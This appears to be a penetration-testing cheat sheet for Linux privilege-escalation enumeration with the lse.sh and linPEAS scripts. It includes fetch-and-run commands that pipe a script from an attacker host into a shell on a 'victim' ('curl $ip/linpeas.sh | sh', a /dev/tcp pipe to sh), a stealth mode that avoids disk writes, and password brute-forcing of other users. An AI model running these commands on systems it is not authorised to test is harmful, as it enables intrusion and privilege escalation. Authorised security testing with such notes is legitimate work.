# install
wget "https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh" -O lse.sh
curl "https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh" -o lse.sh
# usage
# shows interesting information that should help you to privesc
./lse.sh -l1
# dump all the information it gathers about the system
./lse.sh -l2
linPEAS
# install
wget "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" -O linpeas.sh
# COMMANDS
# Local network
# On the Host
sudo python -m SimpleHTTPServer 80
# On the Victim
curl $ip/linpeas.sh | sh
# Without curl
# On the Host
sudo nc -q 5 -lvnp 80 < linpeas.sh
# On the Victim
cat < /dev/tcp/10.10.10.10/80 | sh
# USAGE
#all checks - deeper system enumeration, but it takes longer to complete.
./linpeas.sh -a
# superfast & stealth - This will bypass some time consuming checks. In stealth mode Nothing will be written to the disk.
./linpeas.sh -s
#Password - Pass a password that will be used with sudo -l and bruteforcing other users
./linpeas.sh -P
# enumeration
run enumerate # to enumerate the whole server
run enumerate.file.caps # to enumerate linux capabilities
run enumerate.file.suid # to enumerate suid files
